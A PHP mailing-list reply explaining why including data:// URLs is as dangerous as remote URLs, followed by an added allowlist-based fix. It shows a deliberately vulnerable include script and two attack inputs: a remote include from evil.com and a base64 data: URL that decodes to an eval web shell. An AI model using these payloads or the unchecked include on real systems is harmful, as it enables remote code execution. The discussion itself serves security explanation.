On 11/03/13 12:36, Christian Stoller wrote:
> Hi Stas.
>> I'm afraid it is not a good idea. allow_url_fopen is meant to protect
>> file functions (fopen and friends) from being injected with
>> user-controlled data - i.e. if you control the filesystem and you do
>> fopen() under allow_url_fopen then it is reasonable to assume the data
>> under that filename is under your control. However, data:// URLs clearly
>> violate this assumption no less than http:// URLs do - data: just does
>> it without even requiring a web server.
> I am unsure whether I understand you. As far as I know with the data://
> stream PHP does not access any file on the filesystem. It's just for
> transforming normal content in a variable to a resource, or not? So I do not
> see any risk. Maybe you can give me an example.

Suppose you had the silly script:

<?php
$file = $_GET['file'];
include $file . ".php";

As there's no check at all to $file, an attacker could pass in the url
&file=http://evil.com/backdoor-code and php would happily run the php
code located at http://evil.com/backdoor-code.php

If include of data urls is enabled, the attacker could do the same with
&file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K
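
The include from the message above with the file name checked before use, as an added example that is not part of the original message. The page names, the pages/ directory and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: an allowlisted include. Names and paths are hypothetical.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';                 // assumed directory of includable scripts
const ALLOWED_PAGES = ['home', 'about', 'contact'];  // assumed allowlist of page names

/**
 * Map a user-supplied page name to a local file path, or null if rejected.
 */
function resolve_page(string $name): ?string
{
    // 1. Exact allowlist match. Anything carrying a scheme (http://, data:,
    //    php://) or a path component ("../") can never equal a listed name.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defence in depth: the resolved path must exist and stay inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample inputs: one listed name and the input shapes from the thread.
// A listed name is also rejected if pages/<name>.php does not exist on disk.
$samples = [
    'home',
    'http://example.com/x',
    'data:text/plain;base64,aGVsbG8=',
    '../../etc/passwd',
];

foreach ($samples as $input) {
    $resolved = resolve_page($input);
    printf("%-35s => %s\n", $input, $resolved ?? 'rejected');
    // In the real script: if ($resolved !== null) { include $resolved; }
}
```

The check does not depend on the allow_url_fopen setting, because the value passed to include is never taken from the request.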